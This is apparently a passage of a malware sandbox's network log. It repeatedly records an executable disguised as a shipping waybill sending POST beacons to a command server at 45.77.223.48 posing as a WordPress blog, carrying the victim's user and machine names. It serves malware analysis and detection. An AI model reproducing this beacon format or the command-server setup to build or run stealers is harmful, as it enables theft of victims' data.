                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:27.705368042 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:26 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:27.705421925 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:27.705519915 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:27.715054989 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:27.715293884 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:27.715348959 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:27.715540886 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:27.715682030 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:27.715744019 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:27.715795040 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              70192.168.2.44982045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:27.987761021 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:28.115480900 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:28.941181898 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:28 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:28.941246033 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:28.949131966 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:28.949371099 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:28.949536085 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:28.949678898 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:28.949820995 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:28.949891090 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:28.949930906 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:43:28.949980974 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.2.44982145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:29.212593079 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:29.338315010 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:30.139460087 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:29 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:30.139564991 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                              Apr 25, 2024 09:43:30.139586926 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:30.146388054 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:30.146583080 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:30.146697998 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:30.146894932 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:30.147095919 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:30.147156954 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:30.147313118 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.2.44982245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:30.405107021 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:30.530937910 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:31.361849070 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:30 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:31.361907005 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                              Apr 25, 2024 09:43:31.361972094 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:31.369494915 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:31.369570971 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:31.369694948 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:31.369793892 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:31.369925976 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:31.370008945 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:31.370086908 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              73192.168.2.44982345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:31.634110928 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:31.759985924 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:32.594166040 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:31 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:32.594182968 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:32.594274998 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:43:32.594414949 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:43:32.594516039 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:32.604420900 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:32.604782104 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:32.604861975 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:32.604990005 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
